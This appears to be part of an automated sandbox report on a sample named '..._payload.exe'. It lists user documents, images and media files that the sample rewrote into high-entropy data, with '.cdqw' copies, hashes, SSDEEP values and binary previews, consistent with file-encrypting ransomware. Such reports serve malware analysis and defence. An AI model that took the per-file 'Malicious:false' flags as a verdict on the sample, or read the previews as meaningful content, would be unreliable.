                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.851622102163727
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:o4rsC3fLFgiDmVxymN/woBlL2zcoXmkd5xamjXwjk4wiG+StRn8aLBQ5X2fn2bD:o4rsCPL6pxymhBlmcYdtZi43HIXD
                                                                                                                                                                      MD5:FBA8EC285DAD38CD58054199997B8D5A
                                                                                                                                                                      SHA1:1164C7CAB6D85974DAABFFB7597343688C58ED3D
                                                                                                                                                                      SHA-256:63B742298976314D645A55849487D137980B2E074A17B9EFC7226C4EB67C1A84
                                                                                                                                                                      SHA-512:C28C4A525398448287C22CA084A7FE2C09CD439A4BA50F3CCAC0A66F83EC881364C81DB7E49B09A0639FE838345E03D2AA6C2F424B2223D3375F0C436E5AAAE3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:XZXHA...NFt;$..uOQ.......OvY.9A~.G2.Y...w(mk..gz..S3..P.......W..2..K.0.:.$.#~.{)o...;..N.....|...K...~.&....hk..4.|..5.z.....#......:P..!..,....e1.e.D2......3/.S.C...p..\7.@.t...vQ...G....jMI<-..6a;.A.....&..i.KX([.....l..[.....)`...u......@...L...Hti.w.|.g.;.z....D....}2.#A.Mo.......x.|-......)....cDy..vix7m.Z.a..7..W..m_..6.=R.......="<O|..$r..?.6....Q.E.NYyQ...el.<P.1~...z.}.P...t...az...O.X..0D..0. :Z:..SZ.._".S..l...6..../|+.0..O...y....b*.].F.7e.........6..~..,[.T..,....q.e*....B..w..P})g.).g.Me.........o..2....H%+%...v.."F./...5.zv...h.m..A_........O..a.5..f.T.N.26h..0.W.T|.mR...:..x...p....9Y.Vu0./.A........#U.U.B.U..gxE`F.^...1...,.p...?.....E.^...!.'...Z/.s8&..c.2......j........]..X.Z...V/.....E..*.&A....TN..|oG...z.T--.|.8R.L.............6&..+.../B...$.B&e..........K..k.^.....#)....(....B..*..r.h..1.4...-.G%jI:.A.....:.....N.`.[5/s..Y."!.......|c.=.j..tU2..U...N_.].m.l..7.t.P...(.......$=.u..s8...MU.k...6.Wh.4..~./.8..N+."

                                                                                                                                                                      C:\Users\user\Documents\HTAGVDFUIE.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.850571544205284
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YpF/2itRuvSFTiSudvTu9YBXhXqLACm1GG/mABLy2D+BA5Za2rsGSVKD2bD:4FOitRtF2SX9mBQG/zLb+BAa2ItD
                                                                                                                                                                      MD5:FCF6604B6F32FFFD0C9FC04ED0F916D3
                                                                                                                                                                      SHA1:7AE228EE46EC785D1DE38EC06BE7C5157D3FE290
                                                                                                                                                                      SHA-256:29ECBD4B46C20B0F0FD32B7EF489820D1CBC64C22391A5DB3C335E3907562D30
                                                                                                                                                                      SHA-512:D55EC45C94C839CA3CE3C67582FE358FA826E8C685C6A4E19CD4503A36ED59152816D00BA925602578899731E0BF044CAB3D11B322813559EEFD2F8FC24CBE33
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:HTAGVk.W)...%.... .?<.......\.(.....W(H..-..7.5c.V\....6C.......*......XE..r............H..C!:f..o......].c.C.)..R."e.F.......x..(.h.!@.D.f.!.b...OJ...).._D.......?=....K...D].?w..m.q.!p....[$.b.....M..8..{}..zS...`.$.|.....[..GmX.(`....U....%........S.6..Q.A1IJ.qaS.....3.6.r.Q.l...Q..xpo.xx...C=...D..^=D1B........o{..m<.p.*Y.....D..@%.hlJ.PR@j.3..O5..9o.(..qe...9PWi..6e.Q........N...h.$G0...=.4.S..q.).....VO.J=s..b..%k.F.fz..|H%0..~F '....&.4-!.65..^.O...YH)>T.2.CZ..............pQ]*..l.qG.x..].+.....pD.......:.O..tW.V.f./.N...(....h8.(....u.;d...z.R...xk.!.}Q...=..............|...q;H&..U.'......E7..i_}~....+.#...4....82F....Aw.....!B....c..WzKv.......0...+........4.%...K.Ae..**_f.e.M.H.LG.3v...U.tR;.r.t.n......\.f.5_.Om....x*a.\lhjAI...i.]../........).T...y..#..j.x...b.....jq.@6/........ZzX...(...901.....XuV.*.A.`..*'.$W.1.wz.Y.)Rw'....~.M\..BA.".Uy....r.L..*.5^..ET..tz..h....v.7=..G.}lE..".....p?H...oX.q.{8..>.m.}0....._!.0.pY..<w:.+....

                                                                                                                                                                      C:\Users\user\Documents\HTAGVDFUIE.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.850571544205284
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YpF/2itRuvSFTiSudvTu9YBXhXqLACm1GG/mABLy2D+BA5Za2rsGSVKD2bD:4FOitRtF2SX9mBQG/zLb+BAa2ItD
                                                                                                                                                                      MD5:FCF6604B6F32FFFD0C9FC04ED0F916D3
                                                                                                                                                                      SHA1:7AE228EE46EC785D1DE38EC06BE7C5157D3FE290
                                                                                                                                                                      SHA-256:29ECBD4B46C20B0F0FD32B7EF489820D1CBC64C22391A5DB3C335E3907562D30
                                                                                                                                                                      SHA-512:D55EC45C94C839CA3CE3C67582FE358FA826E8C685C6A4E19CD4503A36ED59152816D00BA925602578899731E0BF044CAB3D11B322813559EEFD2F8FC24CBE33
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:HTAGVk.W)...%.... .?<.......\.(.....W(H..-..7.5c.V\....6C.......*......XE..r............H..C!:f..o......].c.C.)..R."e.F.......x..(.h.!@.D.f.!.b...OJ...).._D.......?=....K...D].?w..m.q.!p....[$.b.....M..8..{}..zS...`.$.|.....[..GmX.(`....U....%........S.6..Q.A1IJ.qaS.....3.6.r.Q.l...Q..xpo.xx...C=...D..^=D1B........o{..m<.p.*Y.....D..@%.hlJ.PR@j.3..O5..9o.(..qe...9PWi..6e.Q........N...h.$G0...=.4.S..q.).....VO.J=s..b..%k.F.fz..|H%0..~F '....&.4-!.65..^.O...YH)>T.2.CZ..............pQ]*..l.qG.x..].+.....pD.......:.O..tW.V.f./.N...(....h8.(....u.;d...z.R...xk.!.}Q...=..............|...q;H&..U.'......E7..i_}~....+.#...4....82F....Aw.....!B....c..WzKv.......0...+........4.%...K.Ae..**_f.e.M.H.LG.3v...U.tR;.r.t.n......\.f.5_.Om....x*a.\lhjAI...i.]../........).T...y..#..j.x...b.....jq.@6/........ZzX...(...901.....XuV.*.A.`..*'.$W.1.wz.Y.)Rw'....~.M\..BA.".Uy....r.L..*.5^..ET..tz..h....v.7=..G.}lE..".....p?H...oX.q.{8..>.m.}0....._!.0.pY..<w:.+....

                                                                                                                                                                      C:\Users\user\Documents\KZWFNRXYKI.jpg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.849736303975262
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:bOvtl8LqE817DonTpGHEQ977Ecc8H625mCjQFLqO1FadDR63cky3m52bD:Eu2DKTkwKH6GmzFL31Fab6Mk2D
                                                                                                                                                                      MD5:96B75C311F9E2663F571879E2930DE1B
                                                                                                                                                                      SHA1:9E3D184113F0A83720C0BEBC77C95AF2824CDFC2
                                                                                                                                                                      SHA-256:8B1D44D31B7CEDADDCACCB0A8E1B923EA84AA2D5A30E41B5468ED464651D0CD1
                                                                                                                                                                      SHA-512:BD7BC360EE71E7AE0E1F6EE88BC42EB2065762376F8B8003B3B8761871CFE5A7DAC99FCFF0D92A1DBE9DE6963744AE40F3CBCA85BC494C9F786E5B2A1E2075BC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN-v.5..e;.:../v...KA]%...d.c0.=T.@.....=v...vM..-.".'.......+.LO@..JT..`4?@i.1u%....S....>EF..+h.....#..p..o.p.o.T^.So=A./..#K..R.&K.e.P.....N+..?.'...H W. `k\..V.....v.{=.4.x...i}.E.9.K..>...4.4.m.P........4.[...Y...!.&wn..?,E-.%....w5.q_....@.<..Q.....%(.@....z.......A...=EV.2.e...|.....\|.".>.o..8....li.....t..u.a0O.V...C.$...Mf.ylHR...$'.I.....j....:...T....../..d..$7.....n,...;..[.....$....w,........\........5.r.....}x..B.x#b....as.$</K.x5.RG."D.. y.....G......)..#..%../.+L...z4.q..D.NX.2...L<..k..e...@&6..f.U....v..i..6? .[..s........Lr.............R..Y.TH+.q...U.x.@~....z...cy.{..e2>.i.>..ub..i.V..?.#.a.x~..,.r.......CU%.N.l .e.+z.=.-.)?..!..].d..(...U.b....Lj.m..U.b.,........Y.N..ve...}.....P.3h.:.6M.O)...YS'.uc2.......U.*..y.v......<........f..N$S....9n?b.J.k0Mk......V..k......aPq|a....W....$U....E..O..-...mcu.R..8hf...<..{/......r5+.A&uW.55b."{..65.yv.P._....If...K...Z}.b.GU(....z4.p*...].w....v....~2.Q.k.(x..).....K.

                                                                                                                                                                      C:\Users\user\Documents\KZWFNRXYKI.jpg.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.849736303975262
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:bOvtl8LqE817DonTpGHEQ977Ecc8H625mCjQFLqO1FadDR63cky3m52bD:Eu2DKTkwKH6GmzFL31Fab6Mk2D
                                                                                                                                                                      MD5:96B75C311F9E2663F571879E2930DE1B
                                                                                                                                                                      SHA1:9E3D184113F0A83720C0BEBC77C95AF2824CDFC2
                                                                                                                                                                      SHA-256:8B1D44D31B7CEDADDCACCB0A8E1B923EA84AA2D5A30E41B5468ED464651D0CD1
                                                                                                                                                                      SHA-512:BD7BC360EE71E7AE0E1F6EE88BC42EB2065762376F8B8003B3B8761871CFE5A7DAC99FCFF0D92A1DBE9DE6963744AE40F3CBCA85BC494C9F786E5B2A1E2075BC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN-v.5..e;.:../v...KA]%...d.c0.=T.@.....=v...vM..-.".'.......+.LO@..JT..`4?@i.1u%....S....>EF..+h.....#..p..o.p.o.T^.So=A./..#K..R.&K.e.P.....N+..?.'...H W. `k\..V.....v.{=.4.x...i}.E.9.K..>...4.4.m.P........4.[...Y...!.&wn..?,E-.%....w5.q_....@.<..Q.....%(.@....z.......A...=EV.2.e...|.....\|.".>.o..8....li.....t..u.a0O.V...C.$...Mf.ylHR...$'.I.....j....:...T....../..d..$7.....n,...;..[.....$....w,........\........5.r.....}x..B.x#b....as.$</K.x5.RG."D.. y.....G......)..#..%../.+L...z4.q..D.NX.2...L<..k..e...@&6..f.U....v..i..6? .[..s........Lr.............R..Y.TH+.q...U.x.@~....z...cy.{..e2>.i.>..ub..i.V..?.#.a.x~..,.r.......CU%.N.l .e.+z.=.-.)?..!..].d..(...U.b....Lj.m..U.b.,........Y.N..ve...}.....P.3h.:.6M.O)...YS'.uc2.......U.*..y.v......<........f..N$S....9n?b.J.k0Mk......V..k......aPq|a....W....$U....E..O..-...mcu.R..8hf...<..{/......r5+.A&uW.55b."{..65.yv.P._....If...K...Z}.b.GU(....z4.p*...].w....v....~2.Q.k.(x..).....K.

                                                                                                                                                                      C:\Users\user\Documents\NIKHQAIQAU.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.848672588346788
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:RKoxgxXS64RwVQ6wUSwp1TyRfHqLIxGb3/zPdo4mH/DwjVogU92bD:RzxaIx6BpvyNwIx4W7QlUWD
                                                                                                                                                                      MD5:101300AD96D0CCCD1981CF651125FADA
                                                                                                                                                                      SHA1:999B5AC50FDF8D87838FAB0B497DF3D383987EDF
                                                                                                                                                                      SHA-256:DE36427C564D88E535422EF2071C10535C5FA711DC1B6190F6C73734AD6B229E
                                                                                                                                                                      SHA-512:E8AFD0C66BAE2EF33FFEAE531B8EB9E2379A2B19E7880E2740F3D20F812DA556CBAADE40F6BECF5143286C09D8477086B1AF3F23438ED89E757D6089E0CBF830
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:NIKHQ...j....r..3.l.M.@..!7.W.`..c..cR.n...Vu.....Xo5...".V....a!..x...H\ .J.n...n...;Q.f...d...<...|.....*..E.6.'..>.:C...).N..v.$......_...#.b...FLN.....J.=n....X;Yx....../AJCg...7...+!..j...!.....?.fZ..K..S.[.......>.!....c.s...I.CN393C.4s..[...9...A]..(rP.x.......2..>......Yk...q.?s~.<..*...[.aZ...1.Y1../.Wc.6...&.VJ#BCjq.........(.S...+f.$.bt.....#.K.......Ev"uV...*...o#&.......&.X.p....G..>..}`?8..o.... .-....w.q..y..U.d..>.....f.T^)...).'s.P.)NtB.1........g 9.8..s_L!Y3N..P.{5.......:..@(..".;.r....3.G.h...L...c.2...v!h.Z..6...&..F.|...m.(Xs7*..7.!...zB...k.;.:"i........5|...D..d.G.#6 ....w.....S3W..\..J..B@98i(..)2!.~.t.......lC9......}f..D...n.(M.p.......!.....?`.~.F...z.....d<...`...$..z..,.:4.'..:...o...62-.p..0...<>....2...Lm.'z!..........9.Tf.g.....B....i3....|.^3...._..,.C.O.?.:H.g..D9Q.V6K./\G...z].....c........3:t...^.SL..f.7.i...G....|..J%b..k.Ir....:G..G0..4.CR\.G....>..m.....R.f..s-..$._.z.=!z3.^K...0..'X.)..<)...#

                                                                                                                                                                      C:\Users\user\Documents\NIKHQAIQAU.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.848672588346788
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:RKoxgxXS64RwVQ6wUSwp1TyRfHqLIxGb3/zPdo4mH/DwjVogU92bD:RzxaIx6BpvyNwIx4W7QlUWD
                                                                                                                                                                      MD5:101300AD96D0CCCD1981CF651125FADA
                                                                                                                                                                      SHA1:999B5AC50FDF8D87838FAB0B497DF3D383987EDF
                                                                                                                                                                      SHA-256:DE36427C564D88E535422EF2071C10535C5FA711DC1B6190F6C73734AD6B229E
                                                                                                                                                                      SHA-512:E8AFD0C66BAE2EF33FFEAE531B8EB9E2379A2B19E7880E2740F3D20F812DA556CBAADE40F6BECF5143286C09D8477086B1AF3F23438ED89E757D6089E0CBF830
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:NIKHQ...j....r..3.l.M.@..!7.W.`..c..cR.n...Vu.....Xo5...".V....a!..x...H\ .J.n...n...;Q.f...d...<...|.....*..E.6.'..>.:C...).N..v.$......_...#.b...FLN.....J.=n....X;Yx....../AJCg...7...+!..j...!.....?.fZ..K..S.[.......>.!....c.s...I.CN393C.4s..[...9...A]..(rP.x.......2..>......Yk...q.?s~.<..*...[.aZ...1.Y1../.Wc.6...&.VJ#BCjq.........(.S...+f.$.bt.....#.K.......Ev"uV...*...o#&.......&.X.p....G..>..}`?8..o.... .-....w.q..y..U.d..>.....f.T^)...).'s.P.)NtB.1........g 9.8..s_L!Y3N..P.{5.......:..@(..".;.r....3.G.h...L...c.2...v!h.Z..6...&..F.|...m.(Xs7*..7.!...zB...k.;.:"i........5|...D..d.G.#6 ....w.....S3W..\..J..B@98i(..)2!.~.t.......lC9......}f..D...n.(M.p.......!.....?`.~.F...z.....d<...`...$..z..,.:4.'..:...o...62-.p..0...<>....2...Lm.'z!..........9.Tf.g.....B....i3....|.^3...._..,.C.O.?.:H.g..D9Q.V6K./\G...z].....c........3:t...^.SL..f.7.i...G....|..J%b..k.Ir....:G..G0..4.CR\.G....>..m.....R.f..s-..$._.z.=!z3.^K...0..'X.)..<)...#

                                                                                                                                                                      C:\Users\user\Documents\ONBQCLYSPU.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.860789345705851
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:H0+NZVWwV3Xl2+LuqSa1/XfXVDCyubF+fkikef1tPwuWjRP2bD:U+NrWwVFdCqH1jmaLf1tWtsD
                                                                                                                                                                      MD5:4C3AD1759D871FC7144A392ABFA6F5C6
                                                                                                                                                                      SHA1:973E8EA55B0499ACD8ECBC8BE840D636B9860C54
                                                                                                                                                                      SHA-256:5A9CAD0AC153A1D63E5764C0C390CCA8A46BD86FD3C6B13CB63DCDBD30931B01
                                                                                                                                                                      SHA-512:FB5F12B644B186324672C33D7D2B7D829B3170E4BC39C01105C814C51455BFD0BB465EC5168815EBD6717B44D4FF57B03079FB8CC6E6700A190735C85C529BA2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ONBQCoYr.B..u.g.)..)....G>.iL.l.....JN].....rh*,./.....O7..u!..Hz...-t^......U#e.).....&{|XW2V!..?.#a.0......Ez^.$...o..OG*.[.*...."d#.@.U.=q..9K..~F..a.s..H...d..<.Z...b.5.m.$y...b.9....1..P....i...^-M]....1Kp.U...Wg.$....n..mI..-.g.....B.. .i..-..x.HYVe.rb.v.6...{.M2..k}......Y.....jy$..\K..v.2y........2h..fQ'.K-".......&m......hH.@...;.m.........P.d../t_.\S...N..0.v7....*O...F.. 6.Y.p...bb....-.r.,|..........X.y.+.I...]......"$.H...}l.ol.b.}.e...)~fq.....V4...\.!.u.Yt.2.`......v....].(.y...v....s.j..wH_.....2._.P?........CSV1p..3Gj.......G....E.......%..$.J....r..1...y-.......''r...[~.e..v+.l.L.H<M9...~er.....`d.b..R.x8d...,.i..YUR]..E....e..n.[LP..hv.d.Ic..y..N....9F.j.(..0X..h.....*.\uD..Y......<E*.ZX.c............Id.=.}..Hz....co?.\..:.?..].8.2T.C...=g.g...;..ts...AN0..^...XL2.b..d...UqE...7I`..].....^.5....U....;....?.(#..i....s..}Yx.._.:...X]... ..(.>....b..q.D..a... .2;.'..v<bp.u.>.../.t.F......y.XU......#.gm..b......A.......

                                                                                                                                                                      C:\Users\user\Documents\ONBQCLYSPU.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.860789345705851
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:H0+NZVWwV3Xl2+LuqSa1/XfXVDCyubF+fkikef1tPwuWjRP2bD:U+NrWwVFdCqH1jmaLf1tWtsD
                                                                                                                                                                      MD5:4C3AD1759D871FC7144A392ABFA6F5C6
                                                                                                                                                                      SHA1:973E8EA55B0499ACD8ECBC8BE840D636B9860C54
                                                                                                                                                                      SHA-256:5A9CAD0AC153A1D63E5764C0C390CCA8A46BD86FD3C6B13CB63DCDBD30931B01
                                                                                                                                                                      SHA-512:FB5F12B644B186324672C33D7D2B7D829B3170E4BC39C01105C814C51455BFD0BB465EC5168815EBD6717B44D4FF57B03079FB8CC6E6700A190735C85C529BA2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ONBQCoYr.B..u.g.)..)....G>.iL.l.....JN].....rh*,./.....O7..u!..Hz...-t^......U#e.).....&{|XW2V!..?.#a.0......Ez^.$...o..OG*.[.*...."d#.@.U.=q..9K..~F..a.s..H...d..<.Z...b.5.m.$y...b.9....1..P....i...^-M]....1Kp.U...Wg.$....n..mI..-.g.....B.. .i..-..x.HYVe.rb.v.6...{.M2..k}......Y.....jy$..\K..v.2y........2h..fQ'.K-".......&m......hH.@...;.m.........P.d../t_.\S...N..0.v7....*O...F.. 6.Y.p...bb....-.r.,|..........X.y.+.I...]......"$.H...}l.ol.b.}.e...)~fq.....V4...\.!.u.Yt.2.`......v....].(.y...v....s.j..wH_.....2._.P?........CSV1p..3Gj.......G....E.......%..$.J....r..1...y-.......''r...[~.e..v+.l.L.H<M9...~er.....`d.b..R.x8d...,.i..YUR]..E....e..n.[LP..hv.d.Ic..y..N....9F.j.(..0X..h.....*.\uD..Y......<E*.ZX.c............Id.=.}..Hz....co?.\..:.?..].8.2T.C...=g.g...;..ts...AN0..^...XL2.b..d...UqE...7I`..].....^.5....U....;....?.(#..i....s..}Yx.._.:...X]... ..(.>....b..q.D..a... .2;.'..v<bp.u.>.../.t.F......y.XU......#.gm..b......A.......

                                                                                                                                                                      C:\Users\user\Documents\ONBQCLYSPU\KZWFNRXYKI.mp3

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.865990767327107
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:x6gGaW4phnKIG7N0RK6yyVpv3zp/kjzknojLx7M1NRPKTxGmOJlG72bD:UNaW4zG7Nf+VpvDp8jzkMLx7GN0TxSG0
                                                                                                                                                                      MD5:AF49DBBD57FC18AD2F29D412E0F384CC
                                                                                                                                                                      SHA1:685386E4F28AE14A004D42E1222647F3A0E5AC31
                                                                                                                                                                      SHA-256:2A8E82B2595C9C9A485C8CD2345A9A7E71E6F0756C2ED1ACF9CCA134AB9BDAE6
                                                                                                                                                                      SHA-512:C76B1B66E6179095C8B313BC944248790C3329DDDC585A6EDF75B08D314F8CFBCF2B8AAFE702AF4099FAB57C3621F1066AFF7ED43B092CBEF6C7215663E3B0C5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN~..N=.K.*.../P.........?l...<|...4....%.+.H...NX....R}.....k.;.'h...3...T%w....1q/@..~B...U@.7.oi..<d..N6N........<.&%..(2..1....K.eG.I.X-...4=z.Z...=......6L.65....I..).fL..g|,_.5..o..f..p.F....t l"c .A..r......u'.G...;.)..`8..[.Ka..6m.....<m..ct.@Har..Q.FW..z..BW.R.~....a..7l..I...(..|>2.>.6....F..\TSl.E..[..*h.0..2..<E..L..#...(....l...=i....).{...d..&.+....l..t....oB...../b.....Wi..L~gf.._..D.%...E9B..j.'.#....4....$....r$.bh...X1i%2..eWtp..al......|U.[.F.uv.B.F..;c.~>5.j.Q...YZ..W..m....7..A1..X.sc.......HVR05..r........R..y*.....o\Y.h.I.k...{.R..0...S..(.*..#G.>.=~.\...Df.r..F#...baO.q.,.H.e......&0....Q....iC&j..>..vv.O..{\..G.fAjA.G...*.)..( .J....M.U.._\+1....J..Q$.....B.hd....Pr.....{u.P7.3.qQ7Y9.....mO.<....`4....n.....=...0B....k...q....Yw..^....]Y....w...-...-.{G.e=I.5.B..U.bm...#...\Ec. .O6'..........Av.[C|...u.1H#.Y\G].L..D.l..:.T.4[.<.........^....../.<:=E.;.Hy.2`..%..yP.4v..Y..A.$iZ.Am.8E...Vl,..=....8...9,...K

                                                                                                                                                                      C:\Users\user\Documents\ONBQCLYSPU\KZWFNRXYKI.mp3.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.865990767327107
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:x6gGaW4phnKIG7N0RK6yyVpv3zp/kjzknojLx7M1NRPKTxGmOJlG72bD:UNaW4zG7Nf+VpvDp8jzkMLx7GN0TxSG0
                                                                                                                                                                      MD5:AF49DBBD57FC18AD2F29D412E0F384CC
                                                                                                                                                                      SHA1:685386E4F28AE14A004D42E1222647F3A0E5AC31
                                                                                                                                                                      SHA-256:2A8E82B2595C9C9A485C8CD2345A9A7E71E6F0756C2ED1ACF9CCA134AB9BDAE6
                                                                                                                                                                      SHA-512:C76B1B66E6179095C8B313BC944248790C3329DDDC585A6EDF75B08D314F8CFBCF2B8AAFE702AF4099FAB57C3621F1066AFF7ED43B092CBEF6C7215663E3B0C5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN~..N=.K.*.../P.........?l...<|...4....%.+.H...NX....R}.....k.;.'h...3...T%w....1q/@..~B...U@.7.oi..<d..N6N........<.&%..(2..1....K.eG.I.X-...4=z.Z...=......6L.65....I..).fL..g|,_.5..o..f..p.F....t l"c .A..r......u'.G...;.)..`8..[.Ka..6m.....<m..ct.@Har..Q.FW..z..BW.R.~....a..7l..I...(..|>2.>.6....F..\TSl.E..[..*h.0..2..<E..L..#...(....l...=i....).{...d..&.+....l..t....oB...../b.....Wi..L~gf.._..D.%...E9B..j.'.#....4....$....r$.bh...X1i%2..eWtp..al......|U.[.F.uv.B.F..;c.~>5.j.Q...YZ..W..m....7..A1..X.sc.......HVR05..r........R..y*.....o\Y.h.I.k...{.R..0...S..(.*..#G.>.=~.\...Df.r..F#...baO.q.,.H.e......&0....Q....iC&j..>..vv.O..{\..G.fAjA.G...*.)..( .J....M.U.._\+1....J..Q$.....B.hd....Pr.....{u.P7.3.qQ7Y9.....mO.<....`4....n.....=...0B....k...q....Yw..^....]Y....w...-...-.{G.e=I.5.B..U.bm...#...\Ec. .O6'..........Av.[C|...u.1H#.Y\G].L..D.l..:.T.4[.<.........^....../.<:=E.;.Hy.2`..%..yP.4v..Y..A.$iZ.Am.8E...Vl,..=....8...9,...K

                                                                                                                                                                      C:\Users\user\Documents\ONBQCLYSPU\ONBQCLYSPU.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.846410065412783
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Er5/wuCk7Jl8MJvZWaXvsLCzFp7jiMAiSCnUZOO0G8z9K4tRZIiHMj2bD:Er54uJJuklkG/viMvQZ30lz9zRCiND
                                                                                                                                                                      MD5:EC1487DC2B47E2C2E48F9F14362B03D9
                                                                                                                                                                      SHA1:53099B9D10B98A41FA9D3A3125FD0ABD6DBB99AE
                                                                                                                                                                      SHA-256:29654CDE0A760C42A6D2FDF140EFF2AD5C2A64BFA94444211D3697A70650B1BF
                                                                                                                                                                      SHA-512:8D773F89B3E263E96BFED62C6FA82037F3C57611A4BF9F076352583F0A8A0DA599C609B1C6E839C9C3EC27A366B51BD2E6AD5864EC4A44DBDA43036D23E3C5D2
                                                                                                                                                                      Malicious:false
